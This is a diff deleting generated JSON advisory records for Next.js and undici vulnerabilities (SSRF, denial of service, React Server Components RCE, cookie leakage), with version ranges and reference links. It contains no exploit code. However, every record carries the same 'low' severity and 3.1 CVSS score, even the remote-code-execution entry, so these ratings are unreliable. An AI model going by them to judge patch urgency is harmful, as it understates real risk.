"source_names": [
"OSV Next.js"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,76 +0,0 @@
{
"canonical_id": "nextjs--CVE-2025-57822",
"system_id": "nextjs",
"display_name": "Next.js",
"category": "frameworks",
"advisory_mode": "core",
"title": "Next.js Improper Middleware Redirect Handling Leads to SSRF",
"summary": "A vulnerability in **Next.js Middleware** has been fixed in **v14.2.32** and **v15.4.7**. The issue occurred when request headers were directly passed into `NextResponse.next()`. In self-hosted applications, this could allow Server-Side Request Forgery (SSRF) if certain sensitive headers from the incoming request were reflected back into the response.\n\nAll users implementing custom middleware logic in self-hosted environments are strongly encouraged to upgrade and verify correct usage of the `next()` function.\n\nMore details at [Vercel Changelog](https://vercel.com/changelog/cve-2025-57822)",
"published_at": "2025-08-29T21:33:09Z",
"updated_at": "2026-02-04T04:20:45.658010Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-4342-x723-ch2f",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-57822",
"https://github.com/vercel/next.js/commit/9c9aaed5bb9338ef31b0517ccf0ab4414f2093d8",
"https://github.com/vercel/next.js",
"https://vercel.com/changelog/cve-2025-57822"
],
"aliases": [
"CVE-2025-57822",
"GHSA-4342-x723-ch2f"
],
"cve_ids": [
"CVE-2025-57822"
],
"ghsa_ids": [
"GHSA-4342-x723-ch2f"
],
"osv_ids": [
"GHSA-4342-x723-ch2f"
],
"affected_versions": [
"introduced=0.9.9, fixed<14.2.32",
"introduced=15.0.0-canary.0, fixed<15.4.7"
],
"fixed_versions": [
"14.2.32",
"15.4.7"
],
"package_name": "next",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-57822.md",
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage",
"ssrf-url-validation"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "ssrf-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Next.js"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,77 +0,0 @@
{
"canonical_id": "nextjs--CVE-2025-59471",
"system_id": "nextjs",
"display_name": "Next.js",
"category": "frameworks",
"advisory_mode": "core",
"title": "Next.js self-hosted applications vulnerable to DoS via Image Optimizer remotePatterns configuration",
"summary": "A DoS vulnerability exists in self-hosted Next.js applications that have `remotePatterns` configured for the Image Optimizer. The image optimization endpoint (`/_next/image`) loads external images entirely into memory without enforcing a maximum size limit, allowing an attacker to cause out-of-memory conditions by requesting optimization of arbitrarily large images. This vulnerability requires that `remotePatterns` is configured to allow image optimization from external domains and that the attacker can serve or control a large image on an allowed domain.\n\nStrongly consider upgrading to 15.5.10 and 16.1.5 to reduce risk and prevent availability issues in Next applications.",
"published_at": "2026-01-27T19:18:25Z",
"updated_at": "2026-02-10T01:28:46.973023Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-9g9p-9gw9-jx7f",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-59471",
"https://github.com/vercel/next.js/commit/500ec83743639addceaede95e95913398975156c",
"https://github.com/vercel/next.js/commit/e5b834d208fe0edf64aa26b5d76dcf6a176500ec",
"https://github.com/vercel/next.js",
"https://github.com/vercel/next.js/releases/tag/v15.5.10",
"https://github.com/vercel/next.js/releases/tag/v16.1.5"
],
"aliases": [
"CVE-2025-59471",
"GHSA-9g9p-9gw9-jx7f"
],
"cve_ids": [
"CVE-2025-59471"
],
"ghsa_ids": [
"GHSA-9g9p-9gw9-jx7f"
],
"osv_ids": [
"GHSA-9g9p-9gw9-jx7f"
],
"affected_versions": [
"introduced=10.0.0, fixed<15.5.10",
"introduced=15.6.0-canary.0, fixed<16.1.5"
],
"fixed_versions": [
"15.5.10",
"16.1.5"
],
"package_name": "next",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-59471.md",
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Next.js"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,74 +0,0 @@
{
"canonical_id": "nextjs--CVE-2025-59472",
"system_id": "nextjs",
"display_name": "Next.js",
"category": "frameworks",
"advisory_mode": "core",
"title": "Next.js has Unbounded Memory Consumption via PPR Resume Endpoint ",
"summary": "A denial of service vulnerability exists in Next.js versions with Partial Prerendering (PPR) enabled when running in minimal mode. The PPR resume endpoint accepts unauthenticated POST requests with the `Next-Resume: 1` header and processes attacker-controlled postponed state data. Two closely related vulnerabilities allow an attacker to crash the server process through memory exhaustion:\n\n1. **Unbounded request body buffering**: The server buffers the entire POST request body into memory using `Buffer.concat()` without enforcing any size limit, allowing arbitrarily large payloads to exhaust available memory.\n\n2. **Unbounded decompression (zipbomb)**: The resume data cache is decompressed using `inflateSync()` without limiting the decompressed output size. A small compressed payload can expand to hundreds of megabytes or gigabytes, causing memory exhaustion.\n\nBoth attack vectors result in a fatal V8 out-of-memory error (`FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory`) causing the Node.js process to terminate. The zipbomb variant is particularly dangerous as it can bypass reverse proxy request size limits while still causing large memory allocation on the server.\n\nTo be affected, an application must run with `experimental.ppr: true` or `cacheComponents: true` configured along with the NEXT_PRIVATE_MINIMAL_MODE=1 environment variable.\n\nStrongly consider upgrading to 15.6.0-canary.61 or 16.1.5 to reduce risk and prevent availability issues in Next applications.",
"published_at": "2026-01-28T15:20:55Z",
"updated_at": "2026-02-06T13:13:43.709252Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-5f7q-jpqc-wp7h",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-59472",
"https://github.com/vercel/next.js",
"https://vercel.com/changelog/summaries-of-cve-2025-59471-and-cve-2025-59472"
],
"aliases": [
"CVE-2025-59472",
"GHSA-5f7q-jpqc-wp7h"
],
"cve_ids": [
"CVE-2025-59472"
],
"ghsa_ids": [
"GHSA-5f7q-jpqc-wp7h"
],
"osv_ids": [
"GHSA-5f7q-jpqc-wp7h"
],
"affected_versions": [
"introduced=15.0.0-canary.0, fixed<15.6.0-canary.61",
"introduced=16.0.0-beta.0, fixed<16.1.5"
],
"fixed_versions": [
"15.6.0-canary.61",
"16.1.5"
],
"package_name": "next",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-59472.md",
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Next.js"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,90 +0,0 @@
{
"canonical_id": "nextjs--GHSA-5j59-xgg2-r9c4",
"system_id": "nextjs",
"display_name": "Next.js",
"category": "frameworks",
"advisory_mode": "core",
"title": "Next has a Denial of Service with Server Components - Incomplete Fix Follow-Up",
"summary": "It was discovered that the fix for [CVE-2025-55184](https://github.com/advisories/GHSA-2m3v-v2m8-q956) in React Server Components was incomplete and did not fully mitigate denial-of-service conditions across all payload types. As a result, certain crafted inputs could still trigger excessive resource consumption. \n\nThis vulnerability affects React versions 19.0.2, 19.1.3, and 19.2.2, as well as frameworks that bundle or depend on these versions, including Next.js 13.x, 14.x, 15.x, and 16.x when using the App Router. The issue is tracked upstream as [CVE-2025-67779](https://www.cve.org/CVERecord?id=CVE-2025-67779).\n\nA malicious actor can send a specially crafted HTTP request to a Server Function endpoint that, when deserialized, causes the React Server Components runtime to enter an infinite loop. This can lead to sustained CPU consumption and cause the affected server process to become unresponsive, resulting in a denial-of-service condition in unpatched environments.",
"published_at": "2025-12-12T17:21:57Z",
"updated_at": "2026-02-04T02:46:38.768104Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-5j59-xgg2-r9c4",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-67779",
"https://github.com/vercel/next.js",
"https://nextjs.org/blog/security-update-2025-12-11",
"https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components",
"https://www.cve.org/CVERecord?id=CVE-2025-55184",
"https://www.facebook.com/security/advisories/cve-2025-67779"
],
"aliases": [
"GHSA-5j59-xgg2-r9c4"
],
"cve_ids": [],
"ghsa_ids": [
"GHSA-5j59-xgg2-r9c4"
],
"osv_ids": [
"GHSA-5j59-xgg2-r9c4"
],
"affected_versions": [
"introduced=13.3.1-canary.0, fixed<14.2.35",
"introduced=15.0.6, fixed<15.0.7",
"introduced=15.1.10, fixed<15.1.11",
"introduced=15.2.7, fixed<15.2.8",
"introduced=15.3.7, fixed<15.3.8",
"introduced=15.4.9, fixed<15.4.10",
"introduced=15.5.8, fixed<15.5.9",
"introduced=15.6.0-canary.59, fixed<15.6.0-canary.60",
"introduced=16.0.9, fixed<16.0.10",
"introduced=16.1.0-canary.17, fixed<16.1.0-canary.19"
],
"fixed_versions": [
"14.2.35",
"15.0.7",
"15.1.11",
"15.2.8",
"15.3.8",
"15.4.10",
"15.5.9",
"15.6.0-canary.60",
"16.0.10",
"16.1.0-canary.19"
],
"package_name": "next",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-5j59-xgg2-r9c4.md",
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Next.js"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,83 +0,0 @@
{
"canonical_id": "nextjs--GHSA-9qr9-h5gf-34mp",
"system_id": "nextjs",
"display_name": "Next.js",
"category": "frameworks",
"advisory_mode": "core",
"title": "Next.js is vulnerable to RCE in React flight protocol",
"summary": "A vulnerability affects certain React packages<sup>1</sup> for versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 and frameworks that use the affected packages, including Next.js 15.x and 16.x using the App Router. The issue is tracked upstream as [CVE-2025-55182](https://www.cve.org/CVERecord?id=CVE-2025-55182). \n\nFixed in:\nReact: 19.0.1, 19.1.2, 19.2.1\nNext.js: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7, 15.6.0-canary.58, 16.1.0-canary.12+\n\nThe vulnerability also affects experimental canary releases starting with 14.3.0-canary.77. Users on any of the 14.3 canary builds should either downgrade to a 14.x stable release or 14.3.0-canary.76.\n\nAll users of stable 15.x or 16.x Next.js versions should upgrade to a patched, stable version immediately.\n\n<sup>1</sup> The affected React packages are:\n- react-server-dom-parcel\n- react-server-dom-turbopack\n- react-server-dom-webpack",
"published_at": "2025-12-03T19:07:11Z",
"updated_at": "2026-02-04T03:45:15.823345Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/facebook/react/security/advisories/GHSA-fv66-9v8q-g76r",
"secondary_source_urls": [
"https://github.com/vercel/next.js/security/advisories/GHSA-9qr9-h5gf-34mp",
"https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-fmh4-wr37-44fp",
"https://nvd.nist.gov/vuln/detail/CVE-2025-55182",
"https://github.com/vercel/next.js"
],
"aliases": [
"GHSA-9qr9-h5gf-34mp"
],
"cve_ids": [],
"ghsa_ids": [
"GHSA-9qr9-h5gf-34mp"
],
"osv_ids": [
"GHSA-9qr9-h5gf-34mp"
],
"affected_versions": [
"introduced=14.3.0-canary.77, fixed<15.0.5",
"introduced=15.1.0-canary.0, fixed<15.1.9",
"introduced=15.2.0-canary.0, fixed<15.2.6",
"introduced=15.3.0-canary.0, fixed<15.3.6",
"introduced=15.4.0-canary.0, fixed<15.4.8",
"introduced=15.5.0-canary.0, fixed<15.5.7",
"introduced=16.0.0-canary.0, fixed<16.0.7"
],
"fixed_versions": [
"15.0.5",
"15.1.9",
"15.2.6",
"15.3.6",
"15.4.8",
"15.5.7",
"16.0.7"
],
"package_name": "next",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-9qr9-h5gf-34mp.md",
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage",
"dependency-upgrade-policy"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Next.js"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,88 +0,0 @@
{
"canonical_id": "nextjs--GHSA-h25m-26qc-wcjf",
"system_id": "nextjs",
"display_name": "Next.js",
"category": "frameworks",
"advisory_mode": "core",
"title": "Next.js HTTP request deserialization can lead to DoS when using insecure React Server Components",
"summary": "A vulnerability affects certain React Server Components packages for versions 19.0.x, 19.1.x, and 19.2.x and frameworks that use the affected packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream as [CVE-2026-23864](https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg).\n\nA specially crafted HTTP request can be sent to any App Router Server Function endpoint that, when deserialized, may trigger excessive CPU usage, out-of-memory exceptions, or server crashes. This can result in denial of service in unpatched environments.",
"published_at": "2026-01-28T15:38:01Z",
"updated_at": "2026-02-13T00:43:52.836085Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg",
"secondary_source_urls": [
"https://github.com/vercel/next.js/security/advisories/GHSA-h25m-26qc-wcjf",
"https://nvd.nist.gov/vuln/detail/CVE-2026-23864",
"https://github.com/vercel/next.js",
"https://vercel.com/changelog/summary-of-cve-2026-23864"
],
"aliases": [
"GHSA-h25m-26qc-wcjf"
],
"cve_ids": [],
"ghsa_ids": [
"GHSA-h25m-26qc-wcjf"
],
"osv_ids": [
"GHSA-h25m-26qc-wcjf"
],
"affected_versions": [
"introduced=13.0.0, fixed<15.0.8",
"introduced=15.1.1-canary.0, fixed<15.1.12",
"introduced=15.2.0-canary.0, fixed<15.2.9",
"introduced=15.3.0-canary.0, fixed<15.3.9",
"introduced=15.4.0-canary.0, fixed<15.4.11",
"introduced=15.5.1-canary.0, fixed<15.5.10",
"introduced=15.6.0-canary.0, fixed<15.6.0-canary.61",
"introduced=16.0.0-beta.0, fixed<16.0.11",
"introduced=16.1.0-canary.0, fixed<16.1.5"
],
"fixed_versions": [
"15.0.8",
"15.1.12",
"15.2.9",
"15.3.9",
"15.4.11",
"15.5.10",
"15.6.0-canary.61",
"16.0.11",
"16.1.5"
],
"package_name": "next",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-h25m-26qc-wcjf.md",
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage",
"dependency-upgrade-policy",
"deserialization-safety"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "deserialization-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Next.js"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,88 +0,0 @@
{
"canonical_id": "nextjs--GHSA-mwv6-3258-q52c",
"system_id": "nextjs",
"display_name": "Next.js",
"category": "frameworks",
"advisory_mode": "core",
"title": "Next Vulnerable to Denial of Service with Server Components",
"summary": "A vulnerability affects certain React packages for versions 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.1.2, 19.2.0, and 19.2.1 and frameworks that use the affected packages, including Next.js 15.x and 16.x using the App Router. The issue is tracked upstream as [CVE-2025-55184](https://www.cve.org/CVERecord?id=CVE-2025-55184).\n\nA malicious HTTP request can be crafted and sent to any App Router endpoint that, when deserialized, can cause the server process to hang and consume CPU. This can result in denial of service in unpatched environments.",
"published_at": "2025-12-11T22:49:27Z",
"updated_at": "2026-02-04T03:55:54.855562Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-mwv6-3258-q52c",
"secondary_source_urls": [
"https://github.com/vercel/next.js",
"https://nextjs.org/blog/security-update-2025-12-11",
"https://www.cve.org/CVERecord?id=CVE-2025-55184"
],
"aliases": [
"GHSA-mwv6-3258-q52c"
],
"cve_ids": [],
"ghsa_ids": [
"GHSA-mwv6-3258-q52c"
],
"osv_ids": [
"GHSA-mwv6-3258-q52c"
],
"affected_versions": [
"introduced=13.3.0, fixed<14.2.34",
"introduced=15.0.0-canary.0, fixed<15.0.6",
"introduced=15.1.1-canary.0, fixed<15.1.10",
"introduced=15.2.0-canary.0, fixed<15.2.7",
"introduced=15.3.0-canary.0, fixed<15.3.7",
"introduced=15.4.0-canary.0, fixed<15.4.9",
"introduced=15.5.1-canary.0, fixed<15.5.8",
"introduced=15.6.0-canary.0, fixed<15.6.0-canary.59",
"introduced=16.0.0-beta.0, fixed<16.0.9",
"introduced=16.1.0-canary.0, fixed<16.1.0-canary.17"
],
"fixed_versions": [
"14.2.34",
"15.0.6",
"15.1.10",
"15.2.7",
"15.3.7",
"15.4.9",
"15.5.8",
"15.6.0-canary.59",
"16.0.9",
"16.1.0-canary.17"
],
"package_name": "next",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-mwv6-3258-q52c.md",
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage",
"dependency-upgrade-policy"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Next.js"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,86 +0,0 @@
{
"canonical_id": "nextjs--GHSA-w37m-7fhw-fmv9",
"system_id": "nextjs",
"display_name": "Next.js",
"category": "frameworks",
"advisory_mode": "core",
"title": "Next Server Actions Source Code Exposure ",
"summary": "A vulnerability affects certain React packages for versions 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.1.2, 19.2.0, and 19.2.1 and frameworks that use the affected packages, including Next.js 15.x and 16.x using the App Router. The issue is tracked upstream as [CVE-2025-55183](https://www.cve.org/CVERecord?id=CVE-2025-55183).\n\nA malicious HTTP request can be crafted and sent to any App Router endpoint that can return the compiled source code of [Server Functions](https://react.dev/reference/rsc/server-functions). This could reveal business logic, but would not expose secrets unless they were hardcoded directly into [Server Function](https://react.dev/reference/rsc/server-functions) code.",
"published_at": "2025-12-11T22:49:56Z",
"updated_at": "2026-02-04T02:51:40.627151Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-w37m-7fhw-fmv9",
"secondary_source_urls": [
"https://github.com/vercel/next.js",
"https://nextjs.org/blog/security-update-2025-12-11",
"https://www.cve.org/CVERecord?id=CVE-2025-55183"
],
"aliases": [
"GHSA-w37m-7fhw-fmv9"
],
"cve_ids": [],
"ghsa_ids": [
"GHSA-w37m-7fhw-fmv9"
],
"osv_ids": [
"GHSA-w37m-7fhw-fmv9"
],
"affected_versions": [
"introduced=15.0.0-canary.0, fixed<15.0.6",
"introduced=15.1.1-canary.0, fixed<15.1.10",
"introduced=15.2.0-canary.0, fixed<15.2.7",
"introduced=15.3.0-canary.0, fixed<15.3.7",
"introduced=15.4.0-canary.0, fixed<15.4.9",
"introduced=15.5.1-canary.0, fixed<15.5.8",
"introduced=15.6.0-canary.0, fixed<15.6.0-canary.59",
"introduced=16.0.0-beta.0, fixed<16.0.9",
"introduced=16.1.0-canary.0, fixed<16.1.0-canary.17"
],
"fixed_versions": [
"15.0.6",
"15.1.10",
"15.2.7",
"15.3.7",
"15.4.9",
"15.5.8",
"15.6.0-canary.59",
"16.0.9",
"16.1.0-canary.17"
],
"package_name": "next",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-w37m-7fhw-fmv9.md",
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage",
"dependency-upgrade-policy"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Next.js"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,79 +0,0 @@
{
"canonical_id": "undici--CVE-2022-31151",
"system_id": "undici",
"display_name": "Undici",
"category": "frameworks",
"advisory_mode": "core",
"title": "undici before v5.8.0 vulnerable to uncleared cookies on cross-host / cross-origin redirect",
"summary": "### Impact\n\nAuthorization headers are already cleared on cross-origin redirect in\nhttps://github.com/nodejs/undici/blob/main/lib/handler/redirect.js#L189, based on https://github.com/nodejs/undici/issues/872.\n\nHowever, cookie headers which are sensitive headers and are official headers found in the spec, remain uncleared. There also has been active discussion of implementing a cookie store https://github.com/nodejs/undici/pull/1441, which suggests that there are active users using cookie headers in undici.\nAs such this may lead to accidental leakage of cookie to a 3rd-party site or a malicious attacker who can control the redirection target (ie. an open redirector) to leak the cookie to the 3rd party site.\n\n### Patches\n\nThis was patched in v5.8.0.\n\n### Workarounds\n\nBy default, this vulnerability is not exploitable.\nDo not enable redirections, i.e. `maxRedirections: 0` (the default). \n\n### References\n\nhttps://hackerone.com/reports/1635514\nhttps://curl.se/docs/CVE-2018-1000007.html\nhttps://curl.se/docs/CVE-2022-27776.html\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [undici repository](https://github.com/nodejs/undici/issues)\n* To make a report, follow the [SECURITY](https://github.com/nodejs/node/blob/HEAD/SECURITY.md) document\n",
"published_at": "2022-07-21T20:31:05Z",
"updated_at": "2026-02-04T03:02:08.652391Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-q768-x9m6-m9qp",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2022-31151",
"https://github.com/nodejs/undici/issues/872",
"https://github.com/nodejs/undici/pull/1441",
"https://github.com/nodejs/undici/commit/0a5bee9465e627be36bac88edf7d9bbc9626126d",
"https://hackerone.com/reports/1635514",
"https://github.com/nodejs/undici",
"https://github.com/nodejs/undici/blob/main/lib/handler/redirect.js#L189",
"https://github.com/nodejs/undici/releases/tag/v5.8.0",
"https://security.netapp.com/advisory/ntap-20220909-0006"
],
"aliases": [
"CVE-2022-31151",
"GHSA-q768-x9m6-m9qp"
],
"cve_ids": [
"CVE-2022-31151"
],
"ghsa_ids": [
"GHSA-q768-x9m6-m9qp"
],
"osv_ids": [
"GHSA-q768-x9m6-m9qp"
],
"affected_versions": [
"introduced=0, fixed<5.8.0"
],
"fixed_versions": [
"5.8.0"
],
"package_name": "undici",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2022-31151.md",
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary",
"token-cookie-storage",
"dependency-upgrade-policy"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "ssrf-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Undici"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,71 +0,0 @@
{
"canonical_id": "undici--CVE-2022-32210",
"system_id": "undici",
"display_name": "Undici",
"category": "frameworks",
"advisory_mode": "core",
"title": "ProxyAgent vulnerable to MITM",
"summary": "### Description\n\n`Undici.ProxyAgent` never verifies the remote server's certificate, and always exposes all request & response data to the proxy. This unexpectedly means that proxies can MitM all HTTPS traffic, and if the proxy's URL is HTTP then it also means that nominally HTTPS requests are actually sent via plain-text HTTP between Undici and the proxy server.\n\n### Impact\n\nThis affects all use of HTTPS via HTTP proxy using **`Undici.ProxyAgent`** with Undici or Node's global `fetch`. In this case, it removes all HTTPS security from all requests sent using Undici's `ProxyAgent`, allowing trivial MitM attacks by anybody on the network path between the client and the target server (local network users, your ISP, the proxy, the target server's ISP, etc).\nThis less seriously affects HTTPS via HTTPS proxies. When you send HTTPS via a proxy to a remote server, the proxy can freely view or modify all HTTPS traffic unexpectedly (but only the proxy). \n\n### Patches\n\nThis issue was patched in Undici v5.5.1.\n\n### Workarounds\n\nAt the time of writing, the only workaround is to not use `ProxyAgent` as a dispatcher for TLS Connections.",
"published_at": "2022-06-17T01:02:29Z",
"updated_at": "2026-03-13T22:15:23.541247Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-pgw7-wx7w-2w33",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2022-32210",
"https://hackerone.com/reports/1583680",
"https://github.com/nodejs/undici"
],
"aliases": [
"CVE-2022-32210",
"GHSA-pgw7-wx7w-2w33"
],
"cve_ids": [
"CVE-2022-32210"
],
"ghsa_ids": [
"GHSA-pgw7-wx7w-2w33"
],
"osv_ids": [
"GHSA-pgw7-wx7w-2w33"
],
"affected_versions": [
"introduced=4.8.2, fixed<5.5.1"
],
"fixed_versions": [
"5.5.1"
],
"package_name": "undici",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2022-32210.md",
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "ssrf-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Undici"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,81 +0,0 @@
{
"canonical_id": "undici--CVE-2023-45143",
"system_id": "undici",
"display_name": "Undici",
"category": "frameworks",
"advisory_mode": "core",
"title": "Undici's cookie header not cleared on cross-origin redirect in fetch",
"summary": "### Impact\n\nUndici clears Authorization headers on cross-origin redirects, but does not clear `Cookie` headers. By design, `cookie` headers are [forbidden request headers](https://fetch.spec.whatwg.org/#forbidden-request-header), disallowing them to be set in `RequestInit.headers` in browser environments. Since Undici handles headers more liberally than the specification, there was a disconnect from the assumptions the spec made, and Undici's implementation of fetch.\n\nAs such this may lead to accidental leakage of cookie to a 3rd-party site or a malicious attacker who can control the redirection target (ie. an open redirector) to leak the cookie to the 3rd party site.\n\n### Patches\n\nThis was patched in [e041de359221ebeae04c469e8aff4145764e6d76](https://github.com/nodejs/undici/commit/e041de359221ebeae04c469e8aff4145764e6d76), which is included in version 5.26.2.\n",
"published_at": "2023-10-16T14:05:37Z",
"updated_at": "2026-02-04T02:35:56.289390Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-q768-x9m6-m9qp",
"secondary_source_urls": [
"https://github.com/nodejs/undici/security/advisories/GHSA-wqq4-5wpv-mx2g",
"https://nvd.nist.gov/vuln/detail/CVE-2023-45143",
